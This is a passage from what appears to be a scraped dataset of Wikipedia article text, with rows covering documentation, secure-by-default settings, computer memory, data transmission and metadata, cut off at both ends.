engineers, technical experts, medical professionals, etc. to define and then create documentation to meet the user's needs. Corporate communications includes other types of written documentation, for example: The following are typical software documentation types: The following are typical hardware and service documentation types: A common type of software document written in the simulation industry is the SDF. When developing software for a simulator, which can range from embedded avionics devices to 3D terrain databases by way of full motion control systems, the engineer keeps a notebook detailing the development "the build" of the project or module. The document can be a wiki page, Microsoft Word document or other environment. They should contain a requirements section, an interface section to detail the communication interface of the software. Often a notes section is used to detail the proof of concept, and then track errors and enhancements. Finally, a testing section to document how the software was tested. This documents conformance to the client's requirements. The result is a detailed description of how the software is designed, how to build and install the software on the target device, and any known defects and workarounds. This build document enables future developers and maintainers to come up to speed on the software in a timely manner, and also provides a roadmap to modifying code or searching for bugs. These software tools can automatically collect data of your network equipment. The data could be for inventory and for configuration information. The Information Technology Infrastructure Library requests to create such a database as a basis for all information for the IT responsible. It is also the basis for IT documentation. Examples include XIA Configuration. 11 "Documentation" is the preferred term for the process of populating criminal databases. Examples include the National Counterterrorism Center's Terrorist Identities Datamart Environment, sex offender registries, and gang databases. 12 Documentation, as it pertains to the early childhood education field, is "when we notice and value children's ideas, thinking, questions, and theories about the world and then collect traces of their work (drawings, photographs of the children in action, and transcripts of their words) to share with a wider community". 13 Thus, documentation is a process, used to link the educator's knowledge and learning of the child children with the families, other collaborators, and even to the children themselves. Documentation is an integral part of the cycle of inquiry - observing, reflecting, documenting, sharing and responding. 13 Pedagogical documentation, in terms of the teacher documentation, is the "teacher's story of the movement in children's understanding". 13 According to Stephanie Cox Suarez in "Documentation - Transforming our Perspectives", "teachers are considered researchers, and documentation is a research tool to support knowledge building among children and adults". 14 Documentation can take many different styles in the classroom. The following exemplifies ways in which documentation can make the research, or learning, visible: Documentation is certainly a process in and of itself, and it is also a process within the educator. The following is the development of documentation as it progresses for and in the educator themselves: |
199 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Secure_by_default | Security by default, in software, means that the default configuration settings are the most secure settings possible, which are not necessarily the most user-friendly settings. In many cases, security and user-friendliness are evaluated based on both risk analysis and usability tests. This leads to the discussion of what the most secure settings are. As a result, the precise meaning of "secure by default" remains undefined. In a network operating system, this typically means first and foremost that there are no listening INET(6) domain sockets after installation; that is, no open network ports. This can be checked on the local machine with a tool like netstat and remotely with a port scanner such as nmap. As a general rule, a secure network is only as secure as the least secure node in the entire network. If a program uses secure configuration settings by default, the user will be better protected. citation needed However, not all users consider security citation needed and may be obstructed by secure settings. A common example is whether or not blank passwords are allowed for login. Not everyone can, or is willing to, type or memorize a password. citation needed Another way to secure a program or system is through abstraction, where the user has presented an interface in which the user cannot (or is discouraged to) cause (accidental) data loss. This, however, can lead to less functionality or reduced flexibility. citation needed Having user control preferences does not typically cause this but at the cost of having a larger part of the user interface for configuration controls. Some servers or devices that have an authentication system, have default usernames and passwords. If not properly changed, anyone who knows the default configuration can successfully authenticate. For non-unique defaults, this practice would violate the principle of 'security by default'. OpenBSD claims to be the only operating system that is fully secure by default. This, however, does not mean it is inherently the most secure operating system. This is because that depends on the definition of an operating system. There are many operating systems that are not capable of networking with other systems, and when considering the amount of network-based security compromises today, one can argue such an operating system is more secure. OpenBSD is a network operating system. Ubuntu is a Linux distribution aimed at desktop users that hides the administrative account by default and only allows the first user to gain administrative privileges for certain system tasks (such as installing system updates, and managing disk drives). macOS does not hide this account, but users with limited rights can still fully utilise the system. citation needed Microsoft Windows and Linspire have been criticized citation needed for allowing the user to have administrative privileges without warning—a potential threat to the system. Windows Vista and subsequent versions of Windows attempt to remedy this situation through its User Account Control system. |
200 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Memory_(computers) | Computer memory stores information, such as data and programs, for immediate use in the computer. 2 The term memory is often synonymous with the terms RAM, main memory, or primary storage. Archaic synonyms for main memory include core (for magnetic core memory) and store. 3 Main memory operates at a high speed compared to mass storage which is slower but less expensive per bit and higher in capacity. Besides storing opened programs and data being actively processed, computer memory serves as a mass storage cache and write buffer to improve both reading and writing performance. Operating systems borrow RAM capacity for caching so long as it is not needed by running software. 4 If needed, contents of the computer memory can be transferred to storage; a common way of doing this is through a memory management technique called virtual memory. Modern computer memory is implemented as semiconductor memory, 5 6 where data is stored within memory cells built from MOS transistors and other components on an integrated circuit. 7 There are two main kinds of semiconductor memory: volatile and non-volatile. Examples of non-volatile memory are flash memory and ROM, PROM, EPROM, and EEPROM memory. Examples of volatile memory are dynamic random-access memory (DRAM) used for primary storage and static random-access memory (SRAM) used mainly for CPU cache. Most semiconductor memory is organized into memory cells each storing one bit (0 or 1). Flash memory organization includes both one bit per memory cell and a multi-level cell capable of storing multiple bits per cell. The memory cells are grouped into words of fixed word length, for example, 1, 2, 4, 8, 16, 32, 64 or 128 bits. Each word can be accessed by a binary address of N bits, making it possible to store 2N words in the memory. In the early 1940s, memory technology often permitted a capacity of a few bytes. The first electronic programmable digital computer, the ENIAC, using thousands of vacuum tubes, could perform simple calculations involving 20 numbers of ten decimal digits stored in the vacuum tubes. The next significant advance in computer memory came with acoustic delay-line memory, developed by J. Presper Eckert in the early 1940s. Through the construction of a glass tube filled with mercury and plugged at each end with a quartz crystal, delay lines could store bits of information in the form of sound waves propagating through the mercury, with the quartz crystals acting as transducers to read and write bits. Delay-line memory was limited to a capacity of up to a few thousand bits. Two alternatives to the delay line, the Williams tube and Selectron tube, originated in 1946, both using electron beams in glass tubes as means of storage. Using cathode-ray tubes, Fred Williams invented the Williams tube, which was the first random-access computer memory. The Williams tube was able to store more information than the Selectron tube (the Selectron was limited to 256 bits, while the Williams tube could store thousands) and was less expensive. The Williams tube was nevertheless frustratingly sensitive to environmental disturbances. Efforts began in the late 1940s to find non-volatile memory. Magnetic-core memory allowed for memory recall after power loss. It was developed by Frederick W. Viehe and An Wang in the late 1940s, and improved by Jay Forrester and Jan A. Rajchman in the early 1950s, before being commercialized with the Whirlwind I computer in 1953. 8 Magnetic-core memory was the dominant form of memory until the development of MOS semiconductor memory in the 1960s. 9 The first semiconductor memory was implemented as a flip-flop circuit in the early 1960s using bipolar transistors. 9 Semiconductor memory made from discrete devices was first shipped by Texas Instruments to the United States Air Force in 1961. In the same year, the concept of solid-state memory on an integrated circuit (IC) chip was proposed by applications engineer Bob Norman at Fairchild Semiconductor. 10 The first bipolar semiconductor memory IC chip was the SP95 introduced by IBM in 1965. 9 While semiconductor memory offered improved performance over magnetic-core memory, it remained larger and more expensive and did not displace magnetic-core memory until the late 1960s. 9 11 The invention of the metal oxide semiconductor field-effect transistor (MOSFET) enabled the practical use of metal oxide semiconductor (MOS) transistors as memory cell storage elements. MOS memory was developed by John Schmidt at Fairchild Semiconductor in 1964. 12 In addition to higher performance, MOS semiconductor memory was cheaper and consumed less power than magnetic core memory. 13 In 1965, J. Wood and R. Ball of the Royal Radar Establishment proposed digital storage systems that use CMOS (complementary MOS) memory cells, in addition to MOSFET power devices for the power supply, switched cross-coupling, switches and delay-line storage. 14 The development of silicon-gate MOS integrated circuit (MOS IC) technology by Federico Faggin at Fairchild in 1968 enabled the production of MOS memory chips. 15 NMOS memory was commercialized by IBM in the early 1970s. 16 MOS memory overtook magnetic core memory as the dominant memory technology in the early 1970s. 13 The two main types of volatile random-access memory (RAM) are static random-access memory (SRAM) and dynamic random-access memory (DRAM). Bipolar SRAM was invented by Robert Norman at Fairchild Semiconductor in 1963, 9 followed by the development of MOS SRAM by John Schmidt at Fairchild in 1964. 13 SRAM became an alternative to magnetic-core memory, but requires six transistors for each bit of data. 17 Commercial use of SRAM began in 1965, when IBM introduced their SP95 SRAM chip for the System 360 Model 95. 9 Toshiba introduced bipolar DRAM memory cells for its Toscal BC 1411 electronic calculator in 1965. 18 19 While it offered improved performance, bipolar DRAM could not compete with the lower price of the then dominant magnetic-core memory. 20 MOS technology is the basis for modern DRAM. In 1966, Robert H. Dennard at the IBM Thomas J. Watson Research Center was working on MOS memory. While examining the characteristics of MOS technology, he found it was possible to build capacitors, and that storing a charge or no charge on the MOS capacitor could represent the 1 and 0 of a bit, while the MOS transistor could control writing the charge to the capacitor. This led to his development of a single-transistor DRAM memory cell. 17 In 1967, Dennard filed a patent for a single-transistor DRAM memory cell based on MOS technology. 21 This led to the first commercial DRAM IC chip, the Intel 1103 in October 1970. 22 23 24 Synchronous dynamic random-access memory (SDRAM) later debuted with the Samsung KM48SL2000 chip in 1992. 25 26 The term memory is also often used to refer to non-volatile memory including read-only memory (ROM) through modern flash memory. Programmable read-only memory (PROM) was invented by Wen Tsing Chow in 1956, while working for the Arma Division of the American Bosch Arma Corporation. 27 28 In 1967, Dawon Kahng and Simon Sze of Bell Labs proposed that the floating gate of a MOS semiconductor device could be used for the cell of a reprogrammable ROM, which led to Dov Frohman of Intel inventing EPROM (erasable PROM) in 1971. 29 EEPROM (electrically erasable PROM) was developed by Yasuo Tarui, Yutaka Hayashi and Kiyoko Naga at the Electrotechnical Laboratory in 1972. 30 Flash memory was invented by Fujio Masuoka at Toshiba in the early 1980s. 31 32 Masuoka and colleagues presented the invention of NOR flash in 1984, 33 and then NAND flash in 1987. 34 Toshiba commercialized NAND flash memory in 1987. 35 36 37 Developments in technology and economies of scale have made possible so-called very large memory (VLM) computers. 37 Volatile memory is computer memory that requires power to maintain the stored information. Most modern semiconductor volatile memory is either static RAM (SRAM) or dynamic RAM (DRAM). a DRAM dominates for desktop system memory. SRAM is used for CPU cache. SRAM is also found in small embedded systems requiring little memory. SRAM retains its contents as long as the power is connected and may use a simpler interface, but commonly uses six transistors per bit. Dynamic RAM is more complicated for interfacing and control, needing regular refresh cycles to prevent losing its contents, but uses only one transistor and one capacitor per bit, allowing it to reach much higher densities and much cheaper per-bit costs. 2 23 37 Non-volatile memory can retain the stored information even when not powered. Examples of non-volatile memory include read-only memory, flash memory, most types of magnetic computer storage devices (e.g. hard disk drives, floppy disks and magnetic tape), optical discs, and early computer storage methods such as magnetic drum, paper tape and punched cards. 37 Non-volatile memory technologies under development include ferroelectric RAM, programmable metallization cell, Spin-transfer torque magnetic RAM, SONOS, resistive random-access memory, racetrack memory, Nano-RAM, 3D XPoint, and millipede memory. A third category of memory is semi-volatile. The term is used to describe a memory that has some limited non-volatile duration after power is removed, but then data is ultimately lost. A typical goal when using a semi-volatile memory is to provide the high performance and durability associated with volatile memories while providing some benefits of non-volatile memory. For example, some non-volatile memory types experience wear when written. A worn cell has increased volatility but otherwise continues to work. Data locations which are written frequently can thus be directed to use worn circuits. As long as the location is updated within some known retention time, the data stays valid. After a period of time without update, the value is copied to a less-worn circuit with longer retention. Writing first to the worn area allows a high write rate while avoiding wear on the not-worn circuits. 38 As a second example, an STT-RAM can be made non-volatile by building large cells, but doing so raises the cost per bit and power requirements and reduces the write speed. Using small cells improves cost, power, and speed, but leads to semi-volatile behavior. In some applications, the increased volatility can be managed to provide many benefits of a non-volatile memory, for example by removing power but forcing a wake-up before data is lost; or by caching read-only data and discarding the cached data if the power-off time exceeds the non-volatile threshold. 39 The term semi-volatile is also used to describe semi-volatile behavior constructed from other memory types, such as nvSRAM, which combines SRAM and a non-volatile memory on the same chip, where an external signal copies data from the volatile memory to the non-volatile memory, but if power is removed before the copy occurs, the data is lost. Another example is battery-backed RAM, which uses an external battery to power the memory device in case of external power loss. If power is off for an extended period of time, the battery may run out, resulting in data loss. 37 Proper management of memory is vital for a computer system to operate properly. Modern operating systems have complex systems to properly manage memory. Failure to do so can lead to bugs or slow performance. Improper management of memory is a common cause of bugs and security vulnerabilities, including the following types: Virtual memory is a system where physical memory is managed by the operating system typically with assistance from a memory management unit, which is part of many modern CPUs. It allows multiple types of memory to be used. For example, some data can be stored in RAM while other data is stored on a hard drive (e.g. in a swapfile), functioning as an extension of the cache hierarchy. This offers several advantages. Computer programmers no longer need to worry about where their data is physically stored or whether the user's computer will have enough memory. The operating system will place actively used data in RAM, which is much faster than hard disks. When the amount of RAM is not sufficient to run all the current programs, it can result in a situation where the computer spends more time moving data from RAM to disk and back than it does accomplishing tasks; this is known as thrashing. Protected memory is a system where each program is given an area of memory to use and is prevented from going outside that range. If the operating system detects that a program has tried to alter memory that does not belong to it, the program is terminated (or otherwise restricted or redirected). This way, only the offending program crashes, and other programs are not affected by the misbehavior (whether accidental or intentional). Use of protected memory greatly enhances both the reliability and security of a computer system. Without protected memory, it is possible that a bug in one program will alter the memory used by another program. This will cause that other program to run off of corrupted memory with unpredictable results. If the operating system's memory is corrupted, the entire computer system may crash and need to be rebooted. At times programs intentionally alter the memory used by other programs. This is done by viruses and malware to take over computers. It may also be used benignly by desirable programs which are intended to modify other programs, debuggers, for example, to insert breakpoints or hooks. |
201 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_transmission | Data communication, including data transmission and data reception, is the transfer of data, transmitted and received over a point-to-point or point-to-multipoint communication channel. Examples of such channels are copper wires, optical fibers, wireless communication using radio spectrum, storage media and computer buses. The data are represented as an electromagnetic signal, such as an electrical voltage, radiowave, microwave, or infrared signal. Analog transmission is a method of conveying voice, data, image, signal or video information using a continuous signal which varies in amplitude, phase, or some other property in proportion to that of a variable. The messages are either represented by a sequence of pulses by means of a line code (baseband transmission), or by a limited set of continuously varying waveforms (passband transmission), using a digital modulation method. The passband modulation and corresponding demodulation is carried out by modem equipment. Digital communications, including digital transmission and digital reception, is the transfer of either a digitized analog signal or a born-digital bitstream. 1 According to the most common definition, both baseband and passband bit-stream components are considered part of a digital signal; an alternative definition considers only the baseband signal as digital, and passband transmission of digital data as a form of digital-to-analog conversion. Courses and textbooks in the field of data transmission 1 as well as digital transmission 2 3 and digital communications 4 5 have similar content. Digital transmission or data transmission traditionally belongs to telecommunications and electrical engineering. Basic principles of data transmission may also be covered within the computer science or computer engineering topic of data communications, which also includes computer networking applications and communication protocols, for example routing, switching and inter-process communication. Although the Transmission Control Protocol (TCP) involves transmission, TCP and other transport layer protocols are covered in computer networking but not discussed in a textbook or course about data transmission. In most textbooks, the term analog transmission only refers to the transmission of an analog message signal (without digitization) by means of an analog signal, either as a non-modulated baseband signal or as a passband signal using an analog modulation method such as AM or FM. It may also include analog-over-analog pulse modulated baseband signals such as pulse-width modulation. In a few books within the computer networking tradition, analog transmission also refers to passband transmission of bit-streams using digital modulation methods such as FSK, PSK and ASK. Note that these methods are covered in textbooks named digital transmission or data transmission, for example. 1 The theoretical aspects of data transmission are covered by information theory and coding theory. Courses and textbooks in the field of data transmission typically deal with the following OSI model protocol layers and topics: It is also common to deal with the cross-layer design of those three layers. 7 Data (mainly but not exclusively informational) has been sent via non-electronic (e.g. optical, acoustic, mechanical) means since the advent of communication. Analog signal data has been sent electronically since the advent of the telephone. However, the first data electromagnetic transmission applications in modern time were electrical telegraphy (1809) and teletypewriters (1906), which are both digital signals. The fundamental theoretical work in data transmission and information theory by Harry Nyquist, Ralph Hartley, Claude Shannon and others during the early 20th century, was done with these applications in mind. In the early 1960s, Paul Baran invented distributed adaptive message block switching for digital communication of voice messages using switches that were low-cost electronics. 8 9 Donald Davies invented and implemented modern data communication during 1965 7, including packet switching, high-speed routers, communication protocols, hierarchical computer networks and the essence of the end-to-end principle. 10 11 12 13 Baran's work did not include routers with software switches and communication protocols, nor the idea that users, rather than the network itself, would provide the reliability. 14 15 16 Both were seminal contributions that influenced the development of computer networks. 17 18 Data transmission is utilized in computers in computer buses and for communication with peripheral equipment via parallel ports and serial ports such as RS 232 (1969), FireWire (1995) and USB (1996). The principles of data transmission are also utilized in storage media for error detection and correction since 1951. The first practical method to overcome the problem of receiving data accurately by the receiver using digital code was the Barker code invented by Ronald Hugh Barker in 1952 and published in 1953. 19 Data transmission is utilized in computer networking equipment such as modems (1940), local area network (LAN) adapters (1964), repeaters, repeater hubs, microwave links, wireless network access points (1997), etc. In telephone networks, digital communication is utilized for transferring many phone calls over the same copper cable or fiber cable by means of pulse-code modulation (PCM) in combination with time-division multiplexing (TDM) (1962). Telephone exchanges have become digital and software controlled, facilitating many value-added services. For example, the first AXE telephone exchange was presented in 1976. Digital communication to the end user using Integrated Services Digital Network (ISDN) services became available in the late 1980s. Since the end of the 1990s, broadband access techniques such as ADSL, Cable modems, fiber-to-the-building (FTTB) and fiber-to-the-home (FTTH) have become widespread to small offices and homes. The current tendency is to replace traditional telecommunication services with packet mode communication such as IP telephony and IPTV. Transmitting analog signals digitally allows for greater signal processing capability. The ability to process a communications signal means that errors caused by random processes can be detected and corrected. Digital signals can also be sampled instead of continuously monitored. The multiplexing of multiple digital signals is much simpler compared to the multiplexing of analog signals. Because of all these advantages, because of the vast demand to transmit computer data and the ability of digital communications to do so and because recent advances in wideband communication channels and solid-state electronics have allowed engineers to realize these advantages fully, digital communications have grown quickly. The digital revolution has also resulted in many digital telecommunication applications where the principles of data transmission are applied. Examples include second-generation (1991) and later cellular telephony, video conferencing, digital TV (1998), digital radio (1999), and telemetry. Data transmission, digital transmission or digital communications is the transfer of data over a point-to-point or point-to-multipoint communication channel. Examples of such channels include copper wires, optical fibers, wireless communication channels, storage media and computer buses. The data are represented as an electromagnetic signal, such as an electrical voltage, radiowave, microwave, or infrared light. While analog transmission is the transfer of a continuously varying analog signal over an analog channel, digital communication is the transfer of discrete messages over a digital or an analog channel. The messages are either represented by a sequence of pulses by means of a line code (baseband transmission), or by a limited set of continuously varying wave forms (passband transmission), using a digital modulation method. The passband modulation and corresponding demodulation (also known as detection) is carried out by modem equipment. According to the most common definition of a digital signal, both baseband and passband signals representing bit-streams are considered as digital transmission, while an alternative definition only considers the baseband signal as digital, and passband transmission of digital data as a form of digital-to-analog conversion. citation needed Data transmitted may be digital messages originating from a data source, for example a computer or a keyboard. It may also be an analog signal such as a phone call or a video signal, digitized into a bit-stream for example using pulse-code modulation (PCM) or more advanced source coding (analog-to-digital conversion and data compression) schemes. This source coding and decoding is carried out by codec equipment. In telecommunications, serial transmission is the sequential transmission of signal elements of a group representing a character or other entity of data. Digital serial transmissions are bits sent over a single wire, frequency or optical path sequentially. Because it requires less signal processing and less chances for error than parallel transmission, the transfer rate of each individual path may be faster. This can be used over longer distances and a check digit or parity bit can be sent along with the data easily. Parallel transmission is the simultaneous transmission of related signal elements over two or more separate paths. Multiple electrical wires are used which can transmit multiple bits simultaneously, which allows for higher data transfer rates than can be achieved with serial transmission. This method is typically used internally within the computer, for example, the internal buses, and sometimes externally for such things as printers. Timing skew can be a significant issue in these systems because the wires in parallel data transmission unavoidably have slightly different properties so some bits may arrive before others, which may corrupt the message. This issue tends to worsen with distance making parallel data transmission less reliable for long distances. Some communications channel types include: Asynchronous serial communication uses start and stop bits to signify the beginning and end of transmission. 20 This method of transmission is used when data are sent intermittently as opposed to in a solid stream. Synchronous transmission synchronizes transmission speeds at both the receiving and sending end of the transmission using clock signals. The clock may be a separate signal or embedded in the data. A continual stream of data is then sent between the two nodes. Due to there being no start and stop bits, the data transfer rate may be more efficient. |
202 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Metadata | Metadata (or metainformation) is "data that provides information about other data", 1 but not the content of the data itself, such as the text of a message or the image itself. 2 There are many distinct types of metadata, including: Metadata is not strictly bound to one of these categories, as it can describe a piece of data in many other ways. Metadata has various purposes. It can help users find relevant information and discover resources. It can also help organize electronic resources, provide digital identification, and archive and preserve resources. Metadata allows users to access resources by "allowing resources to be found by relevant criteria, identifying resources, bringing similar resources together, distinguishing dissimilar resources, and giving location information". 8 Metadata of telecommunication activities including Internet traffic is very widely collected by various national governmental organizations. This data is used for the purposes of traffic analysis and can be used for mass surveillance. 9 Metadata was traditionally used in the card catalogs of libraries until the 1980s when libraries converted their catalog data to digital databases. 10 In the 2000s, as data and information were increasingly stored digitally, this digital data was described using metadata standards. 11 The first description of "meta data" for computer systems is purportedly noted by MIT's Center for International Studies experts David Griffel and Stuart McIntosh in 1967: "In summary then, we have statements in an object language about subject descriptions of data and token codes for the data. We also have statements in a meta language describing the data relationships and transformations, and ought is relations between norm and data. 12 Unique metadata standards exist for different disciplines (e.g., museum collections, digital audio files, websites, etc.). Describing the contents and context of data or data files increases its usefulness. For example, a web page may include metadata specifying what software language the page is written in (e.g., HTML), what tools were used to create it, what subjects the page is about, and where to find more information about the subject. This metadata can automatically improve the reader's experience and make it easier for users to find the web page online. 13 A CD may include metadata providing information about the musicians, singers, and songwriters whose work appears on the disc. In many countries, government organizations routinely store metadata about emails, telephone calls, web pages, video traffic, IP connections, and cell phone locations. citation needed Metadata means "data about data". Metadata is defined as the data providing information about one or more aspects of the data; it is used to summarize basic information about data that can make tracking and working with specific data easier. 14 Some examples include: For example, a digital image may include metadata that describes the size of the image, its color depth, resolution, when it was created, the shutter speed, and other data. 15 A text document's metadata may contain information about how long the document is, who the author is, when the document was written, and a short summary of the document. Metadata within web pages can also contain descriptions of page content, as well as key words linked to the content. 16 These links are often called "Metatags", which were used as the primary factor in determining order for a web search until the late 1990s. 16 The reliance on metatags in web searches was decreased in the late 1990s because of "keyword stuffing", 16 whereby metatags were being largely misused to trick search engines into thinking some websites had more relevance in the search than they really did. 16 Metadata can be stored and managed in a database, often called a metadata registry or metadata repository. 17 However, without context and a point of reference, it might be impossible to identify metadata just by looking at it. 18 For example: by itself, a database containing several numbers, all 13 digits long could be the results of calculations or a list of numbers to plug into an equation without any other context, the numbers themselves can be perceived as the data. But if given the context that this database is a log of a book collection, those 13 digit numbers may now be identified as ISBNs information that refers to the book, but is not itself the information within the book. The term "metadata" was coined in 1968 by Philip Bagley, in his book "Extension of Programming Language Concepts" where it is clear that he uses the term in the ISO 11179 "traditional" sense, which is "structural metadata" i.e. "data about the containers of data"; rather than the alternative sense "content about individual instances of data content" or metacontent, the type of data usually found in library catalogs. 19 20 Since then the fields of information management, information science, information technology, librarianship, and GIS have widely adopted the term. In these fields, the word metadata is defined as "data about data". 21 While this is the generally accepted definition, various disciplines have adopted their own more specific explanations and uses of the term. Slate reported in 2013 that the United States government's interpretation of "metadata" could be broad, and might include message content such as the subject lines of emails. 22 While the metadata application is manifold, covering a large variety of fields, there are specialized and well-accepted models to specify types of metadata. Bretherton Singley (1994) distinguish between two distinct classes: structural control metadata and guide metadata. 23 Structural metadata describes the structure of database objects such as tables, columns, keys and indexes. Guide metadata helps humans find specific items and is usually expressed as a set of keywords in a natural language. According to Ralph Kimball, metadata can be divided into three categories: technical metadata (or internal metadata), business metadata (or external metadata), and process metadata. NISO distinguishes three types of metadata: descriptive, structural, and administrative. 21 Descriptive metadata is typically used for discovery and identification, as information to search and locate an object, such as title, authors, subjects, keywords, and publisher. Structural metadata describes how the components of an object are organized. An example of structural metadata would be how pages are ordered to form chapters of a book. Finally, administrative metadata gives information to help manage the source. Administrative metadata refers to the technical information, such as file type, or when and how the file was created. Two sub-types of administrative metadata are rights management metadata and preservation metadata. Rights management metadata explains intellectual property rights, while preservation metadata contains information to preserve and save a resource. 8 Statistical data repositories have their own requirements for metadata in order to describe not only the source and quality of the data 6 but also what statistical processes were used to create the data, which is of particular importance to the statistical community in order to both validate and improve the process of statistical data production. 7 An additional type of metadata beginning to be more developed is accessibility metadata. Accessibility metadata is not a new concept to libraries; however, advances in universal design have raised its profile. 24 : 213 214 Projects like Cloud4All and GPII identified the lack of common terminologies and models to describe the needs and preferences of users and information that fits those needs as a major gap in providing universal access solutions. 24 : 210 211 Those types of information are accessibility metadata. 24 : 214 Schema.org has incorporated several accessibility properties based on IMS Global Access for All Information Model Data Element Specification. 24 : 214 The Wiki page WebSchemas Accessibility lists several properties and their values. While the efforts to describe and standardize the varied accessibility needs of information seekers are beginning to become more robust, their adoption into established metadata schemas has not been as developed. For example, while Dublin Core (DC)'s "audience" and MARC 21's "reading level" could be used to identify resources suitable for users with dyslexia and DC's "format" could be used to identify resources available in braille, audio, or large print formats, there is more work to be done. 24 : 214 Metadata (metacontent) or, more correctly, the vocabularies used to assemble metadata (metacontent) statements, is typically structured according to a standardized concept using a well-defined metadata scheme, including metadata standards and metadata models. Tools such as controlled vocabularies, taxonomies, thesauri, data dictionaries, and metadata registries can be used to apply further standardization to the metadata. Structural metadata commonality is also of paramount importance in data model development and in database design. Metadata (metacontent) syntax refers to the rules created to structure the fields or elements of metadata (metacontent). 25 A single metadata scheme may be expressed in a number of different markup or programming languages, each of which requires a different syntax. For example, Dublin Core may be expressed in plain text, HTML, XML, and RDF. 26 A common example of (guide) metacontent is the bibliographic classification, the subject, the Dewey Decimal class number. There is always an implied statement in any "classification" of some object. To classify an object as, for example, Dewey class number 514 (Topology) (i.e. books having the number 514 on their spine) the implied statement is: book subject heading 514 . This is a subject-predicate-object triple, or more importantly, a class-attribute-value triple. The first 2 elements of the triple (class, attribute) are pieces of some structural metadata having a defined semantic. The third element is a value, preferably from some controlled vocabulary, some reference (master) data. The combination of the metadata and master data elements results in a statement which is a metacontent statement i.e. "metacontent metadata master data". All of these elements can be thought of as "vocabulary". Both metadata and master data are vocabularies that can be assembled into metacontent statements. There are many sources of these vocabularies, both meta and master data: UML, EDIFACT, XSD, Dewey UDC LoC, SKOS, ISO 25964, Pantone, Linnaean Binomial Nomenclature, etc. Using controlled vocabularies for the components of metacontent statements, whether for indexing or finding, is endorsed by ISO 25964: "If both the indexer and the searcher are guided to choose the same term for the same concept, then relevant documents will be retrieved. 27 This is particularly relevant when considering search engines of the internet, such as Google. The process indexes pages and then matches text strings using its complex algorithm; there is no intelligence or "inferencing" occurring, just the illusion thereof. Metadata schemata can be hierarchical in nature where relationships exist between metadata elements and elements are nested so that parent-child relationships exist between the elements. An example of a hierarchical metadata schema is the IEEE LOM schema, in which metadata elements may belong to a parent metadata element. Metadata schemata can also be one-dimensional, or linear, where each element is completely discrete from other elements and classified according to one dimension only. An example of a linear metadata schema is the Dublin Core schema, which is one-dimensional. Metadata schemata are often 2 dimensional, or planar, where each element is completely discrete from other elements but classified according to 2 orthogonal dimensions. 28 The degree to which the data or metadata is structured is referred to as "granularity". "Granularity" refers to how much detail is provided. Metadata with a high granularity allows for deeper, more detailed, and more structured information and enables a greater level of technical manipulation. A lower level of granularity means that metadata can be created for considerably lower costs but will not provide as detailed information. The major impact of granularity is not only on creation and capture, but moreover on maintenance costs. As soon as the metadata structures become outdated, so too is the access to the referred data. Hence granularity must take into account the effort to create the metadata as well as the effort to maintain it. In all cases where the metadata schemata exceed the planar depiction, some type of hypermapping is required to enable display and view of metadata according to chosen aspect and to serve special views. Hypermapping frequently applies to layering of geographical and geological information overlays. 29 International standards apply to metadata. Much work is being accomplished in the national and international standards communities, especially ANSI (American National Standards Institute) and ISO (International Organization for Standardization) to reach a consensus on standardizing metadata and registries. The core metadata registry standard is ISO IEC 11179 Metadata Registries (MDR), the framework for the standard is described in ISO IEC 11179 1:2004. 30 A new edition of Part 1 is in its final stage for publication in 2015 or early 2016. It has been revised to align with the current edition of Part 3, ISO IEC 11179 3:2013 31 which extends the MDR to support the registration of Concept Systems. (see ISO IEC 11179). This standard specifies a schema for recording both the meaning and technical structure of the data for unambiguous usage by humans and computers. ISO IEC 11179 standard refers to metadata as information objects about data, or "data about data". In ISO IEC 11179 Part 3, the information objects are data about Data Elements, Value Domains, and other reusable semantic and representational information objects that describe the meaning and technical details of a data item. This standard also prescribes the details for a metadata registry, and for registering and administering the information objects within a Metadata Registry. ISO IEC 11179 Part 3 also has provisions for describing compound structures that are derivations of other data elements, for example through calculations, collections of one or more data elements, or other forms of derived data. While this standard describes itself originally as a "data element" registry, its purpose is to support describing and registering metadata content independently of any particular application, lending the descriptions to being discovered and reused by humans or computers in developing new applications, databases, or for analysis of data collected in accordance with the registered metadata content. This standard has become the general basis for other kinds of metadata registries, reusing and extending the registration and administration portion of the standard. The Geospatial community has a tradition of specialized geospatial metadata standards, particularly building on traditions of map- and image-libraries and catalogs. Formal metadata is usually essential for geospatial data, as common text-processing approaches are not applicable. The Dublin Core metadata terms are a set of vocabulary terms that can be used to describe resources for the purposes of discovery. The original set of 15 classic 32 metadata terms, known as the Dublin Core Metadata Element Set 33 are endorsed in the following standards documents: The W3C Data Catalog Vocabulary (DCAT) 37 is an RDF vocabulary that supplements Dublin Core with classes for Dataset, Data Service, Catalog, and Catalog Record. DCAT also uses elements from FOAF, PROV-O, and OWL-Time. DCAT provides an RDF model to support the typical structure of a catalog that contains records, each describing a dataset or service. Although not a standard, Microformat (also mentioned in the section metadata on the internet below) is a web-based approach to semantic markup which seeks to re-use existing HTML XHTML tags to convey metadata. Microformat follows XHTML and HTML standards but is not a standard in itself. One advocate of microformats, Tantek elik, characterized a problem with alternative approaches: Here's a new language we want you to learn, and now you need to output these additional files on your server. It's a hassle. (Microformats) lower the barrier to entry. 38 Metadata may be written into a digital photo file that will identify who owns it, copyright and contact information, what brand or model of camera created the file, along with exposure information (shutter speed, f-stop, etc.) and descriptive information, such as keywords about the photo, making the file or image searchable on a computer and or the Internet. Some metadata is created by the camera such as, color space, color channels, exposure time, and aperture (EXIF), while some is input by the photographer and or software after downloading to a computer. 39 Most digital cameras write metadata about the model number, shutter speed, etc., and some enable you to edit it; 40 this functionality has been available on most Nikon DSLRs since the Nikon D3, on most new Canon cameras since the Canon EOS 7D, and on most Pentax DSLRs since the Pentax K 3. Metadata can be used to make organizing in post-production easier with the use of key-wording. Filters can be used to analyze a specific set of photographs and create selections on criteria like rating or capture time. On devices with geolocation capabilities like GPS (smartphones in particular), the location the photo was taken from may also be included. Photographic Metadata Standards are governed by organizations that develop the following standards. They include, but are not limited to: Information on the times, origins and destinations of phone calls, electronic messages, instant messages, and other modes of telecommunication, as opposed to message content, is another form of metadata. Bulk collection of this call detail record metadata by intelligence agencies has proven controversial after disclosures by Edward Snowden of the fact that certain Intelligence agencies such as the NSA had been (and perhaps still are) keeping online metadata on millions of internet users for up to a year, regardless of whether or not they ever were persons of interest to the agency. Metadata is particularly useful in video, where information about its contents (such as transcripts of conversations and text 